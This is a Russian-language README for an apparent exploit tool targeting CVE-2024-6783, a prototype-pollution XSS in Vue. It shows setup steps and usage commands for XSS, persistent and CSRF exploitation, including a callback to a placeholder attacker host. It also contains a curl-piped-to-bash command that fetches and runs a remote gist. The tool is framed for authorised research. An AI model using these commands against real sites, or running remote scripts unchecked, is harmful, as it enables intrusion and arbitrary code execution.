
CVE-2024-6783 - Vue CVE
В Vue обнаружена уязвимость, которая позволяет атакующему выполнить XSS-атаку через загрязнение прототипа (prototype pollution). Атакующий может изменить цепочку прототипов некоторых свойств, таких как Object.prototype.staticClass или Object.prototype.staticStyle, для выполнения произвольного JavaScript-кода.
Поддержите сопровождение этого проекта через PayPal или отсканировав QR-код ниже.
Используйте этот проект только в безопасных и авторизованных средах, таких как:
Пример настройки:
git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783
# Проект использует Python, следуйте инструкциям ниже
# Создайте виртуальное окружение
python -m venv venv
# Активируйте виртуальное окружение
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Установите зависимости
pip install -r requirements.txt
Пример использования:
# только сканирование
python cve-2024-6783.py -u https://example.com -v
# Сканирование и XSS-эксплуатация
python cve-2024-6783.py -u https://example.com -e xss
# XSS-эксплуатация с обратным вызовом
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback
# Автоматический сервер обратного вызова
python cve-2024-6783.py -u https://example.com -e persistent -c auto
# CSRF-эксплуатация
python cve-2024-6783.py -u https://example.com -e csrf
# Полное сканирование и эксплуатация с подробным выводом
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html
Примечание:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y, чтобы очистить вложенный каталог .gitРепозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.
Этот репозиторий предназначен только для образовательных целей и авторизованных исследований в области безопасности.
Он создан, чтобы помочь пользователям изучить:
Используйте этот репозиторий только в средах, где у вас есть разрешение, например:
Несанкционированное или незаконное использование строго запрещено.
Автор и участники не несут ответственности за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.
Используя этот репозиторий, вы соглашаетесь с тем, что:
Этот проект предназначен для:
Пожалуйста, соблюдайте практики ответственного раскрытия информации и соблюдайте все применимые законы.
Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.